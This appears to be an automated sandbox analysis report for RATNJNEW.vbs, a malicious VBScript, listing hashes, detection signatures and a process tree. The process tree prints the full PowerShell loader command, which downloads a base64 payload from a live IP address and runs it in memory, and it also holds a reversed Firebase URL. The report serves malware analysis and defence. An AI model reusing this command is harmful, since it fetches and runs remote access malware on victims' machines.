Analysis
-
max time kernel
412s -
max time network
415s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
26/09/2022, 22:08
Static task
static1
Behavioral task
behavioral1
Sample
RATNJNEW.vbs
Resource
win7-20220812-en
5 signatures
600 seconds
General
-
Target
RATNJNEW.vbs
-
Size
577KB
-
MD5
0673849361f4aa0726bc1e4704c3dc4b
-
SHA1
76acf5375646a1885c361ca1838fa00c8e721ee2
-
SHA256
b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb
-
SHA512
e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9
-
SSDEEP
96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 964 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1192 wrote to memory of 964 1192 WScript.exe 27 PID 1192 wrote to memory of 964 1192 WScript.exe 27 PID 1192 wrote to memory of 964 1192 WScript.exe 27
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-